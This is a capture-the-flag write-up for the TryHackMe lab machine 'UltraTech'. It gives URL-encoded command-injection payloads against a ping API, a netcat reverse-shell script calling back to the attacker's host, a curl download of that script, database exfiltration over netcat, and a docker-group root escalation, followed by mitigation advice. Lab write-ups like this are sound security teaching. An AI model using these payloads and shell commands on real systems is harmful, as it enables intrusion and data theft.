UltraTech Write-up

Description

“UltraTech” is a boot2root machine on TryHackMe of intermediate difficulty. You have been contracted by UltraTech to pentest their infrastructure. It is a grey-box kind of assessment; the only information you have is the company’s name and their server’s IP address.

Initial access to the machine could be obtained through a command injection vulnerability in the API. After that, credentials could be dumped from a SQLite database file and the hashed passwords could be cracked. The credentials were used to escalate privileges to another user on the box. That user was a member of the docker group, which was used to escalate privileges further to root.

Enumeration

First, an Nmap scan was used to scan all TCP ports on the target machine.

sudo nmap -p- -oN nmap/all -vv 10.10.29.189

In the next step, version enumeration, script scanning and OS enumeration were conducted on the previously discovered ports with Nmap.

sudo nmap -p21,22,8081,31331 -sC -sV -O 10.10.29.189 -oN nmap/scripts -vv

The landing page of the web service on port 8081 showed an API running.

On port 31331 the company web site was served.

A robots.txt file could be found on the web page. This file revealed that there is a file called “utech_sitemap.txt”.

The sitemap revealed further “hidden” pages.

The interesting page here is “partners.html”. This page contains a login form.

By inspecting the web page’s source code, it was found that the following JavaScript code was loaded from the URL “http://10.10.29.189:31331/js/api.js”.

If a user tries to log in, the credentials are sent to “http://10.10.29.189:8081/auth”. Furthermore, the web app was calling the URL “http://10.10.29.189:8081/ping?ip=10.10.29.189” to check if the API is still running. It was possible to ping the attacker machine by changing the ip parameter.

(Screenshot: pinging the attacker machine)
(Screenshot: receiving the ping)

The filter on the ip parameter could be evaded with the following payload (a URL-encoded space and newline before the injected command):

http://10.10.29.189:8081/ping?ip=127.0.0.1%20%0a%20id

Initial Access

The following bash script was created and served by the attacker via HTTP.

#!/bin/bash

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.73.174 443 >/tmp/f

The file was then downloaded to the victim by calling the following URL.

http://10.10.29.189:8081/ping?ip=127.0.0.1%20%0a%20curl%20http://<attacker ip>/shell.sh%20-o%20shell.sh

Calling the following URL executed the script, and the victim connected back to the attacker’s Netcat listener.

http://10.10.29.189:8081/ping?ip=127.0.0.1%20%0A%20bash%20shell.sh

After getting the shell, there was a SQLite database file inside the current working directory. This file was exfiltrated so that it could be analyzed.

(Screenshot: SQLite database file)
(Screenshot: exfiltration via Netcat)

The SQLite database contained MD5 hashes of two users.

Both password hashes could be successfully cracked with CrackStation.

Privilege Escalation to r00t

“r00t” is also a user on the box. A privilege escalation to “r00t” was possible because of password reuse.

At this point it was also possible to log in via SSH with r00t’s credentials. Furthermore, the r00t user is in the “docker” group, as can be seen in the above picture.

Privilege Escalation

The privilege escalation to root could be accomplished by abusing the docker command to mount the host’s /root directory into a container.

docker run -v /root:/mnt -it bash

Mitigation

The filter on the API should be hardened: the ip parameter should be validated against an allow-list of IP address formats rather than a deny-list of shell characters, and the command should not be passed through a shell at all. Furthermore, functionality that is not ready for use should not be deployed on a live machine. Passwords should not be hashed with the MD5 hash function; an appropriate password hashing function should be used instead, e.g. PBKDF2. The password policy should prohibit the use of common passwords and the reuse of passwords, and users of the organization should be encouraged to follow it. Also keep in mind that adding a user to the docker group effectively gives them root rights, so the user r00t should not be in the docker group if that is not needed.

Rabbit

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!